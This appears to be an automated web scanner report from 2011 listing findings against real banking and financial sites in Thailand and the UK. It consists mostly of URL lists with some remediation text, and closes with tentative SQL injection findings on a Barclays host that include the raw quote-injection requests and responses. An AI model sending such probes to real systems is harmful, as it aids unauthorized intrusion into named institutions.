26.84. http://www.ktb.co.th/css/master.css

26.85. http://www.mindworkscorp.com/

26.86. http://www.mindworkscorp.com/bio.html

26.87. http://www.nbcuni.com/wordpress/wp-content/themes/theme-nbcuni/_js/jQuery.inlinePager.js

26.88. http://www.nbcuni.com/wordpress/wp-content/themes/theme-nbcuni/_js/jquery.paginator.js

26.89. http://www.nbcuniversalstore.com/js/omniture/s_code_dageneral.js

26.90. http://www.nbcuniversalstore.com/nbcuniversalstore/behavior/typeface-0.15.js

26.91. https://www.scbbusinessnet.com/cs70_banking/js/jquery.mousewheel.js

26.92. https://www.scbbusinessnet.com/cs70_banking/news/Scripts/jquery.mousewheel.js

26.93. http://www.set.or.th/en/contact/contact.html

26.94. http://www.set.or.th/en/news/issuer_activities/ipo_showcase/set_ipo_showcase_p1.html

26.95. http://www.set.or.th/en/sitemap/for_listing.html

26.96. http://www.set.or.th/highlight/pr-th.html

26.97. http://www.set.or.th/scripts/JSCookMenu.js

26.98. http://www.zlmc.org/

26.99. http://www.zlmc.org/mindfulness-meditation.html

26.100. http://www2.itt-tech.edu/CFIDE/scripts/cfform.js

26.101. http://www2.itt-tech.edu/it/d/applynow/

27. Private IP addresses disclosed

27.1. http://get.adobe.com/flashplayer/

27.2. http://moneytalk.scb.co.th/

27.3. http://static.ak.fbcdn.net/rsrc.php/v1/yZ/r/CormVv6JMOl.js

27.4. http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/g5ZRpvzi0gh.css

27.5. http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js

27.6. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/wFcdvtg8yWA.js

27.7. http://static.ak.fbcdn.net/rsrc.php/v1/zy/r/-cydlOAMbwG.png

27.8. http://www.facebook.com/campaign/landing.php

27.9. http://www.facebook.com/extern/login_status.php

27.10. http://www.facebook.com/extern/login_status.php

27.11. http://www.facebook.com/extern/login_status.php

27.12. http://www.facebook.com/pages/KTB-Care/178373518915

27.13. http://www.facebook.com/plugins/like.php

27.14. http://www.facebook.com/plugins/like.php

27.15. http://www.facebook.com/plugins/like.php

27.16. http://www.google.com/sdch/rU20-FBA.dct

27.17. http://www.set.or.th/

28. Credit card numbers disclosed

29. Robots.txt file

29.1. http://0.r.msn.com/

29.2. http://2-thai.com/bank.html/x22

29.3. http://318395.r.msn.com/

29.4. http://419.myfunforum.org/sutra724.php/x22

29.5. http://914188.r.msn.com/

29.6. http://a.unanimis.co.uk/fc.php

29.7. http://ad.doubleclick.net/adi/agt.nbcuni/homepage

29.8. http://ad.uk.doubleclick.net/activity

29.9. http://adfarm.mediaplex.com/ad/bk/7648-49630-3840-0

29.10. http://admin.instantservice.com/resources/smartbutton/6192/II_Servers.js

29.11. https://adwords.google.com/select/Login

29.12. http://answers.yahoo.com/question/index

29.13. http://api.bing.com/qsonhs.aspx

29.14. http://api.recaptcha.net/js/recaptcha_ajax.js

29.15. http://apps.barclays.co.uk/accessibility/

29.16. https://apps.barclays.co.uk/webchat/invite_background.jpg/u0022

29.17. http://b.scorecardresearch.com/b

29.18. http://banner2.set.or.th/www/delivery/afr.php

29.19. https://center.ktam.co.th/

29.20. http://cspix.media6degrees.com/orbserv/hbpix

29.21. http://de.wikipedia.org/wiki/Liste_der_Banken_in_Thailand

29.22. http://dev.piwik.org/trac/browser/trunk/js/piwik.js

29.23. http://dis.us.criteo.com/dis/dis.aspx

29.24. http://docs.google.com/

29.25. http://domdex.com/f

29.26. http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

29.27. http://en.m.wikipedia.org/wiki

29.28. http://en.wikipedia.org/wiki/List_of_banks_in_Thailand

29.29. https://eprocurement.ktb.co.th/

29.30. https://feedback.live.com/default.aspx

29.31. http://feeds.bbci.co.uk/news/rss.xml

29.32. http://financial-services-summarize-the-web.blogspot.com/2011/04/in-exchange-rate-bangkok-bank-exchange.html/x22

29.33. http://go.microsoft.com/fwlink/

29.34. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1045272592/

29.35. http://ipinfusion.com/products/data_sheets.html

29.36. http://ja.wikipedia.org/wiki/ă?żă?¤ă?®é??čˇ?ă?®ä¸?覧

29.37. http://jquery.org/license

29.38. http://jqueryui.com/about

29.39. http://ktbcare.hi5.com/

29.40. http://l.addthiscdn.com/live/t00/250lo.gif

29.41. http://mail.google.com/mail/

29.42. http://meta.wikimedia.org/w/index.php

29.43. http://metrics.seenon.com/b/ss/delagentnbc,delagentglobalrollup/1/H.17/s25651625484430

29.44. http://mls.marchex.com/c

29.45. http://news.bbc.co.uk/2/hi/help/rss/4498287.stm

29.46. http://news.google.com/news/story

29.47. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

29.48. http://now.eloqua.com/visitor/v200/svrGP.aspx

29.49. http://online.wsj.com/article/BT-CO-20110428-705019.html/x22

29.50. http://onlinehelp.microsoft.com/en-US/bing/ff808506.aspx

29.51. http://pagead2.googlesyndication.com/pagead/imgad

29.52. http://picasaweb.google.com/lh/view

29.53. http://piwik.org/

29.54. http://plugins.jquery.com/node/1208]

29.55. http://randomfactsthailand.com/thailand-breast-slap-sudden-breast-growth-without-surgery/x22

29.56. http://s7.addthis.com/static/r07/sh41.html

29.57. http://safebrowsing.clients.google.com/safebrowsing/downloads

29.58. http://scriptlogiccorp.d2.sc.omtrdc.net/b/ss/slcproduction/1/H.22.1/s27267301290655

29.59. http://sdc.bot.or.th/dcsw4pwnjm3f3ymhgt6lphzp1_5v7q/dcs.gif

29.60. http://search.yahoo.com/mrss/

29.61. https://secure.wikimedia.org/

29.62. http://sorgalla.com/jcarousel/

29.63. http://stackoverflow.com/questions/467336

29.64. http://th.linkedin.com/in/narongchai

29.65. http://th.wikipedia.org/wiki/ราย�ื�อ��า�าร���ระ��ศ��ย

29.66. http://thailandforvisitors.com/general/holidays/x22

29.67. http://toolbarqueries.clients.google.com/tbproxy/af/query

29.68. http://topics.nytimes.com/top/news/business/

29.69. http://translate.google.com/translate_t

29.70. http://translatewiki.net/wiki/MediaWiki:Collapsible-collapse/en

29.71. http://trends.atipat.co.cc/thailand-breast-slap/x22

29.72. http://tv.popcrunch.com/snl-commercials-barkleys-bank-peepers-insurance-video/

29.73. http://twitter.com/ktb_care

29.74. http://v13.lscache4.googlevideo.com/videoplayback

29.75. http://validator.w3.org/check

29.76. http://video.google.com/videoplay%3Fdocid%3D4479130566581116930&rct=j&sa=X&ei=qeq_Tfr2CsOTtweWz5GlBQ&ved=0CG4QwQ0&q=Krung+Thai+Bank&usg=AFQjCNFRaUm-pTmcyp71nTEaQ8bjdxaWkg/x22

29.77. http://webcache.googleusercontent.com/search

29.78. http://webmail.aol.com/

29.79. http://wiki.answers.com/Q/Who_is_Director_of_Barkley_Bank_London

29.80. http://wikimediafoundation.org/wiki/Special:Landingcheck

29.81. http://wikipediareview.com/index.php

29.82. http://www.360travelguide.com/travel_guides.asp/x26amp

29.83. http://www.adobe.com/shockwave/download/download.cgi

29.84. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp

29.85. http://www.barclays.com/privacy/com_privacy.html

29.86. http://www.bot.or.th/english/

29.87. http://www.coolthaihouse.com/forum/viewtopic.php

29.88. http://www.facebook.com/plugins/like.php

29.89. http://www.google-analytics.com/__utm.gif

29.90. http://www.google.com/search

29.91. https://www.google.com/accounts/ServiceLogin

29.92. http://www.googleadservices.com/pagead/conversion/1045272592/

29.93. http://www.independent.co.uk/news/world/asia/x26amp

29.94. http://www.mindworkscorp.com/

29.95. http://www.multimap.com/clients/places.cgi

29.96. http://www.nbcuniversalstore.com/nbcuniversalstore/behavior/ajaxConfig1.js

29.97. http://www.newsroom.barclays.com/content/Detail.aspx

29.98. http://www.scriptlogic.com/sem/g/content/pt-wireless/070610

29.99. http://www.sedoparking.com/search/registrar.php

29.100. http://www.thailandhotelforums.com/forum/index.php

29.101. http://www.youtube.com/results

29.102. http://www.zlmc.org/mindfulness-meditation.html

30. Cacheable HTTPS response

30.1. https://apps.barclays.co.uk/chatl19mV7j/_web6Tfs5lJV6xM.php/u0027,/u0027chatclient/u0027,/u0027width=640,height=480,scrollbars=0/u0027

30.2. https://csc.scb.co.th/

30.3. https://csc.scb.co.th/webclient1/bcm_signin.jsp

30.4. https://csc.scb.co.th/webclient1/cllcntr_en.jsp

30.5. https://csc.scb.co.th/webclient1/index.jsp

30.6. https://dimenxion.bangkokbank.com/bonprd/js/statusbar.js

30.7. https://ebank.kasikornbankgroup.com/kbiznet/login.html

30.8. https://eprocurement.ktb.co.th/

30.9. https://ksupplychain.kasikornbank.com/

30.10. https://secure.wikimedia.org/

30.11. https://www.barclaysfantasyfundmanager.co.uk/

30.12. https://www.bizpayment.ktb.co.th/epayview/

30.13. https://www.ktb.co.th/internetservice/onlineAccountAction.do

30.14. https://www.newcb.ktb.co.th/

30.15. https://www.scbbusinessnet.com/cs70_banking/js/bank-online.html

30.16. https://www.scbbusinessnet.com/cs70_banking/js/scb-quick-link.html

30.17. https://www.scbbusinessnet.com/cs70_banking/news/css/style.txt

30.18. https://www.scbbusinessnet.com/cs70_banking/news/en/scbbus-home-des.html

30.19. https://www.scbeasy.com/1st_pg.html

31. HTML does not specify charset

31.1. https://apps.barclays.co.uk/chatl19mV7j/_web6Tfs5lJV6xM.php/u0027,/u0027chatclient/u0027,/u0027width=640,height=480,scrollbars=0/u0027

31.2. https://csc.scb.co.th/

31.3. https://feedback.live.com/default.aspx

31.4. http://home.controlcase.com/piwik/piwik.php

31.5. https://ibank.barclays.co.uk/olb/w/BasicAccessStart.do

31.6. https://ibank.barclays.co.uk/olb/w/FeedbackOverview.do

31.7. https://ibank.barclays.co.uk/olb/w/ForgottenCardReaderBusiness.do

31.8. https://ibank.barclays.co.uk/olb/w/IndividualSavingsAcctOverview.do

31.9. https://ibank.barclays.co.uk/olb/w/LoanOverview.do

31.10. https://ibank.barclays.co.uk/olb/w/LoginMember.do

31.11. https://ibank.barclays.co.uk/olb/w/MobiLoginMember.do

31.12. https://ibank.barclays.co.uk/olb/w/ReorderPasscodeStandalone.do

31.13. https://ibank.barclays.co.uk/olb/w/TakeonPersonal.do

31.14. https://ibank.barclays.co.uk/olb/w/ViewEStatementHistoryStep1.do

31.15. https://icustody.bangkokbank.com/favicon.ico

31.16. https://ifunds.bangkokbank.com/favicon.ico

31.17. https://ipay.bangkokbank.com/bblscenroll/Resources/privacy.html+Bangkok+Bank+Internet+Log/x26amp

31.18. http://jqueryui.com/about

31.19. http://jscrollpane.kelvinluck.com/

31.20. https://ksupplychain.kasikornbank.com/

31.21. http://m1645.ic-live.com/515/

31.22. http://moneytalk.scb.co.th/

31.23. http://moneytalk.scb.co.th/en/

31.24. http://moneytalk.scb.co.th/en/include/bank-online.html

31.25. http://moneytalk.scb.co.th/en/include/footer.html

31.26. http://moneytalk.scb.co.th/en/include/scb-quick-link.html

31.27. http://moneytalk.scb.co.th/th/include/bank-online.html

31.28. http://moneytalk.scb.co.th/th/include/footer.html

31.29. http://moneytalk.scb.co.th/th/include/scb-quick-link.html

31.30. http://now.eloqua.com/visitor/v200/svrGP.aspx

31.31. http://register2.set.or.th/

31.32. http://www.bangkokbank.com/_layouts/NR/JavaScript/truehitsstat.asp

31.33. http://www.barclays.com/importantinfo/

31.34. http://www.kasikornbank.com/Pages/truehitsstat.html

31.35. http://www.ktam.co.th/media_box.php

31.36. http://www.mindworkscorp.com/

31.37. http://www.mindworkscorp.com/bio.html

31.38. https://www.scb-fx.com/

31.39. https://www.scb-fx.com/favicon.ico

31.40. http://www.scbbusinessnet.com/

31.41. https://www.scbbusinessnet.com/cs70_banking/js/bank-online.html

31.42. https://www.scbbusinessnet.com/cs70_banking/js/scb-quick-link.html

31.43. http://www.scbeasy.com/

31.44. http://www.set.or.th/

31.45. http://www.set.or.th/en/contact/index.html

31.46. http://www.thailandguru.com/thailand-baht-money-transfer-banking-accounts.html#cards/x26amp

31.47. http://www.zlmc.org/membership.html

31.48. http://www22.glam.com/cTagsImg.act

32. HTML uses unrecognised charset

32.1. https://csc.scb.co.th/webclient1/bcm_signin.jsp

32.2. https://csc.scb.co.th/webclient1/cllcntr_en.jsp

32.3. https://csc.scb.co.th/webclient1/index.jsp

32.4. https://ebank.kasikornbankgroup.com/kbiznet/login.html

32.5. https://eprocurement.ktb.co.th/

32.6. https://ibanking.bangkokbank.com/

32.7. https://ibanking.bangkokbank.com/BiB/index.html

32.8. https://ifunds.bangkokbank.com/Login.aspx

32.9. http://marketdata.set.or.th/head-en.html

32.10. http://marketdata.set.or.th/mkt/topten.do

32.11. http://marketdata.set.or.th/shortcut-en.html

32.12. http://marketdata.set.or.th/static/market/set/indextab_en_US.html

32.13. http://moneytalk.scb.co.th/

32.14. http://moneytalk.scb.co.th/index.asp

32.15. https://online.kasikornbankgroup.com/K-Online/ib/login_en.jsp

32.16. http://register2.set.or.th/semreg/detail.aspx

32.17. http://register2.set.or.th/semreg/enroll.aspx

32.18. http://rtradeinfo.bualuang.co.th/tradinginfo.services/price_update.php

32.19. http://sorgalla.com/

32.20. http://sorgalla.com/jcarousel/

32.21. http://truehits.net/

32.22. http://truehits.net/stat.php

32.23. http://www.bangkokbank.com/_layouts/NR/BangkokBankWebApps/Email%20Registration/subscribe.asp

32.24. http://www.bangkokbank.com/_layouts/nr/AccountAccess/account.asp

32.25. http://www.bangkokbank.com/_layouts/nr/BangkokBankWebApps/BLSresearch/MainBLS.asp

32.26. http://www.bangkokbank.com/_layouts/nr/MajorRates/FXRatesRssEn.htm

32.27. http://www.bangkokbank.com/_layouts/nr/MajorRates/MainBannerRss.htm

32.28. http://www.business.barclays.co.uk/BRC1/jsp/brccontrol

32.29. http://www.ktam.co.th/en/alliance.php

32.30. http://www.ktam.co.th/en/declarationnav.php

32.31. http://www.ktam.co.th/en/index.php

32.32. http://www.ktam.co.th/en/index.php/a

32.33. http://www.ktam.co.th/en/index.php/declarationnav.php

32.34. http://www.ktam.co.th/en/index.php/ims/ads_csi300_2.gif

32.35. http://www.ktam.co.th/en/index.php/ims/b_ktam_news11.gif

32.36. http://www.ktam.co.th/en/index.php/ims/b_ktam_news12.gif

32.37. http://www.ktam.co.th/en/index.php/ims/b_ktam_news13.gif

32.38. http://www.ktam.co.th/en/index.php/ims/b_ktam_news21.gif

32.39. http://www.ktam.co.th/en/index.php/ims/b_ktam_news22.gif

32.40. http://www.ktam.co.th/en/index.php/ims/b_ktam_news23.gif

32.41. http://www.ktam.co.th/en/index.php/ims/b_nav11.gif

32.42. http://www.ktam.co.th/en/index.php/ims/b_nav12.gif

32.43. http://www.ktam.co.th/en/index.php/ims/b_nav13.gif

32.44. http://www.ktam.co.th/en/index.php/ims/b_nav21.gif

32.45. http://www.ktam.co.th/en/index.php/ims/b_nav22.gif

32.46. http://www.ktam.co.th/en/index.php/ims/b_nav23.gif

32.47. http://www.ktam.co.th/en/index.php/ims/bg_cr1.gif

32.48. http://www.ktam.co.th/en/index.php/ims/bg_head1.gif

32.49. http://www.ktam.co.th/en/index.php/ims/bg_mmenu01.gif

32.50. http://www.ktam.co.th/en/index.php/ims/bg_mmenu02.gif

32.51. http://www.ktam.co.th/en/index.php/ims/bg_search1.gif

32.52. http://www.ktam.co.th/en/index.php/ims/bt_about1.gif

32.53. http://www.ktam.co.th/en/index.php/ims/bt_agent1.gif

32.54. http://www.ktam.co.th/en/index.php/ims/bt_education_center1.gif

32.55. http://www.ktam.co.th/en/index.php/ims/bt_home2.gif

32.56. http://www.ktam.co.th/en/index.php/ims/bt_news1.gif

32.57. http://www.ktam.co.th/en/index.php/ims/bt_service1.gif

32.58. http://www.ktam.co.th/en/index.php/ims/cmd_search1.gif

32.59. http://www.ktam.co.th/en/index.php/ims/empty.gif

32.60. http://www.ktam.co.th/en/index.php/ims/h_download1.gif

32.61. http://www.ktam.co.th/en/index.php/ims/h_link1.gif

32.62. http://www.ktam.co.th/en/index.php/ims/i_acrobat.gif

32.63. http://www.ktam.co.th/en/index.php/ims/i_firefox.gif

32.64. http://www.ktam.co.th/en/index.php/ims/i_flash.gif

32.65. http://www.ktam.co.th/en/index.php/ims/i_winmedia.gif

32.66. http://www.ktam.co.th/en/index.php/ims/mails.png

32.67. http://www.ktam.co.th/en/index.php/ims/news.php

32.68. http://www.ktam.co.th/en/index.php/ims/p_flag_th.gif

32.69. http://www.ktam.co.th/en/index.php/ims/p_ktamnew.gif

32.70. http://www.ktam.co.th/en/index.php/ims/p_ktamonline.gif

32.71. http://www.ktam.co.th/en/index.php/ims/p_line001.gif

32.72. http://www.ktam.co.th/en/index.php/ims/p_line002.gif

32.73. http://www.ktam.co.th/en/index.php/ims/p_link01.gif

32.74. http://www.ktam.co.th/en/index.php/ims/p_link02.gif

32.75. http://www.ktam.co.th/en/index.php/ims/p_link03.gif

32.76. http://www.ktam.co.th/en/index.php/ims/p_link04.gif

32.77. http://www.ktam.co.th/en/index.php/ims/p_link05.gif

32.78. http://www.ktam.co.th/en/index.php/ims/p_link06.gif

32.79. http://www.ktam.co.th/en/index.php/ims/p_logo1.gif

32.80. http://www.ktam.co.th/en/index.php/ims/p_word1.gif

32.81. http://www.ktam.co.th/en/index.php/media_box.php

32.82. http://www.ktam.co.th/en/index.php/news.inc.php

32.83. http://www.ktam.co.th/en/index.php/news.php

32.84. http://www.ktam.co.th/en/index.php/self_discovery.php

32.85. http://www.ktam.co.th/en/index.php/style/news.php

32.86. http://www.ktam.co.th/en/index.php/style/page.txt

32.87. http://www.ktam.co.th/en/news.inc.php

32.88. http://www.ktam.co.th/pop_up.php

32.89. https://www.ktamsmarttrade.com/FrontWeb/Home/Login.aspx

32.90. https://www.ktb.co.th/internetservice/onlineAccountAction.do

32.91. https://www.newcb.ktb.co.th/

32.92. http://www.scb.co.th/scb_api/scbapi.jsp

32.93. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser

32.94. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/download

32.95. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/information

32.96. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/logon_th

32.97. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/securetip

32.98. http://www.set.or.th/en/contact/contact.html

32.99. http://www.set.or.th/en/index.html

32.100. http://www.set.or.th/en/integrated-set.html

32.101. http://www.set.or.th/en/news/issuer_activities/ipo_showcase/set_ipo_showcase_p1.html

32.102. http://www.set.or.th/en/products/index/setindex_p1.html

32.103. http://www.set.or.th/en/regulations/cg/roles_p1.html

32.104. http://www.set.or.th/en/sitemap/for_listing.html

32.105. http://www.set.or.th/head-en.html

32.106. http://www.set.or.th/highlight/info_en.html

32.107. http://www.set.or.th/highlight/info_th.html

32.108. http://www.set.or.th/highlight/pr-th.html

32.109. http://www.set.or.th/highlight/release_en_US.html

32.110. http://www.set.or.th/nicepage_404.html

32.111. http://www.set.or.th/set/oppdaybyperiod.do

32.112. http://www.set.or.th/shortcut-en.html

32.113. http://www.set.or.th/shortcut-th.html

32.114. http://www.set.or.th/static/news/latestnews_en_US.html

32.115. http://www.set.or.th/static/news/latestnews_th_TH.html

32.116. http://www.set.or.th/th/index.html

32.117. http://www.set.or.th/th/integrated-set.html

32.118. http://www.thailandhotelforums.com/forum/index.php

33. Content type incorrectly stated

33.1. https://feedback.live.com/default.aspx

33.2. http://group.barclays.com/assets/img/icons/favicon.ico

33.3. http://group.barclays.com/cs/Satellite

33.4. http://group.barclays.com/html_phase_2/assets/css/fonts/expertsans-light-webfont.eot

33.5. http://group.barclays.com/html_phase_2/assets/css/fonts/expertsans-light-webfont.woff

33.6. http://group.barclays.com/html_phase_2/assets/css/fonts/expertsans-regular-webfont.eot

33.7. http://group.barclays.com/html_phase_2/assets/css/fonts/expertsans-regular-webfont.woff

33.8. http://lvs.truehits.in.th/goggen.php

33.9. http://meta.wikimedia.org/w/index.php

33.10. http://moneytalk.scb.co.th/css/style.txt

33.11. http://moneytalk.scb.co.th/css/style_th.txt

33.12. http://moneytalk.scb.co.th/en/include/bank-online.html

33.13. http://moneytalk.scb.co.th/en/include/scb-quick-link.html

33.14. http://moneytalk.scb.co.th/th/include/bank-online.html

33.15. http://moneytalk.scb.co.th/th/include/footer.html

33.16. http://moneytalk.scb.co.th/th/include/scb-quick-link.html

33.17. http://now.eloqua.com/visitor/v200/svrGP.aspx

33.18. http://rtradeinfo.bualuang.co.th/tradinginfo.services/css/bbl_style.css

33.19. http://sedoparking.com/r/ads/adcode.js

33.20. http://tc.barclays.co.uk/c

33.21. http://www.bangkokbank.com/Bangkok%20Bank/Pages/Forms/AllItems.aspx

33.22. http://www.bangkokbank.com/Bangkok%20Bank/_layouts/Authenticate.aspx

33.23. http://www.bangkokbank.com/Bangkok%20Bank/_layouts/viewlsts.aspx

33.24. http://www.bangkokbank.com/Online%20Banking/For%20Personal/iBanking/Pages/Forms/AllItems.aspx

33.25. http://www.bangkokbank.com/_layouts/NR/BangkokBank/images/homepage/Feature_chinese.jpg

33.26. http://www.bangkokbank.com/_layouts/nr/MajorRates/ratebanner.css

33.27. http://www.barclays.co.uk/cs/Satellite

33.28. http://www.barclays.co.uk/images/premier_league_masthead.jpg

33.29. http://www.facebook.com/extern/login_status.php

33.30. http://www.google.com/search

33.31. http://www.kasikornbank.com/SiteCollectionDocuments/scripts/start.js

33.32. http://www.ktam.co.th/en/news.inc.php

33.33. http://www.ktam.co.th/en/style/page.txt

33.34. http://www.ktam.co.th/media_box.php

33.35. http://www.ktb.co.th/flash/a1.swf

33.36. http://www.ktb.co.th/flash/a2.swf

33.37. http://www.ktb.co.th/flash/a3.swf

33.38. http://www.ktb.co.th/flash/b1.swf

33.39. http://www.ktb.co.th/flash/b2.swf

33.40. http://www.ktb.co.th/flash/b3.swf

33.41. http://www.ktb.co.th/flash/c1.swf

33.42. http://www.ktb.co.th/flash/c2.swf

33.43. http://www.ktb.co.th/flash/c3.swf

33.44. http://www.ktb.co.th/flash/d1.swf

33.45. http://www.ktb.co.th/flash/d2.swf

33.46. http://www.ktb.co.th/flash/d3.swf

33.47. http://www.ktb.co.th/flash/e1.swf

33.48. http://www.ktb.co.th/flash/e2.swf

33.49. http://www.ktb.co.th/flash/e3.swf

33.50. http://www.ktb.co.th/flash/f1.swf

33.51. http://www.ktb.co.th/flash/f2.swf

33.52. http://www.ktb.co.th/flash/f3.swf

33.53. http://www.ktb.co.th/flash/home_show_flash1.swf

33.54. http://www.ktb.co.th/flash/home_show_flash2.swf

33.55. http://www.ktb.co.th/flash/home_show_flash3.swf

33.56. http://www.ktb.co.th/flash/ktb_group_eng.swf

33.57. http://www.ktb.co.th/flash_eng/ktbslide_index.swf

33.58. http://www.nbcuniversalstore.com/nbcuniversalstore/layout/favicon.ico

33.59. http://www.scb.co.th/favicon.ico

33.60. https://www.scbbusinessnet.com/cs70_banking/js/bank-online.html

33.61. https://www.scbbusinessnet.com/cs70_banking/js/scb-quick-link.html

33.62. https://www.scbbusinessnet.com/cs70_banking/news/css/style.txt

33.63. http://www.scriptlogic.com/_commonfiles/controls/omniturizer.aspx

33.64. http://www.set.or.th/menuFile/topMenu2009-th.js

33.65. http://www.zlmc.org/membership.html

33.66. http://www22.glam.com/cTagsImg.act

34. Content type is not specified

34.1. http://propertyforsale.kasikornbank.com/PropertyForSaleAnnouncement/1,2098,,00.html

34.2. http://www.bangkokbank.com/Online%20Banking/For%20Personal/iBanking/Pages/1

34.3. http://www.bangkokbank.com/bangkok%20bank/pages/blank.gif

34.4. http://www.bangkokbank.com/favicon.ico

34.5. http://www.bangkokbank.com/layouts/NR/BangkokBank/images/homepage/head_line.gif

34.6. http://www.bangkokbank.com/online%20banking%20thai/for%20business/biz%20ibanking/pages/1

34.7. http://www.barclays.co.uk/images/popup_green.gif

34.8. http://www.bot.or.th/favicon.ico

34.9. http://www.bot.or.th/x26amp



1. SQL injection  next
There are 15 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://group.barclays.com/assets/script/webtrends-del.js [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://group.barclays.com
Path:   /assets/script/webtrends-del.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /assets'/script/webtrends-del.js HTTP/1.1
Host: group.barclays.com
Proxy-Connection: keep-alive
Referer: http://group.barclays.com/Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Internal Server Error
Date: Tue, 03 May 2011 13:16:38 GMT
Set-Cookie: JSESSIONID=71CDD23445113C60B2CB06C94195620D.tomcat_1_1; Path=/cs
Content-Type: text/html;charset=UTF-8
Content-Length: 1060
Connection: close

<html><head><title>Apache Tomcat/6.0.32 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...

Request 2

GET /assets''/script/webtrends-del.js HTTP/1.1
Host: group.barclays.com
Proxy-Connection: keep-alive
Referer: http://group.barclays.com/Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:16:39 GMT
Set-Cookie: JSESSIONID=6ACE2F0F7472083BE62948B07BAC43AB.tomcat_2_1; Path=/cs
Cache-Control: no-store
Last-Modified: Tue, 03 May 2011 13:16:39 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 21260


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-gb" xml:lang="en-gb"
...[SNIP]...

1.2. http://group.barclays.com/html_phase_2/assets/css/styles.min.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://group.barclays.com
Path:   /html_phase_2/assets/css/styles.min.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /html_phase_2/assets'/css/styles.min.css HTTP/1.1
Host: group.barclays.com
Proxy-Connection: keep-alive
Referer: http://group.barclays.com/Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Internal Server Error
Date: Tue, 03 May 2011 13:17:15 GMT
Set-Cookie: JSESSIONID=D81550F023755505F38643106E91441F.tomcat_2_1; Path=/cs
Content-Type: text/html;charset=UTF-8
Content-Length: 1060
Connection: close

<html><head><title>Apache Tomcat/6.0.32 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...

Request 2

GET /html_phase_2/assets''/css/styles.min.css HTTP/1.1
Host: group.barclays.com
Proxy-Connection: keep-alive
Referer: http://group.barclays.com/Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:17:16 GMT
Set-Cookie: JSESSIONID=67E752F3A2B61A44311FA1405758F214.tomcat_2_1; Path=/cs
Cache-Control: no-store
Last-Modified: Tue, 03 May 2011 13:17:16 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 21260


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
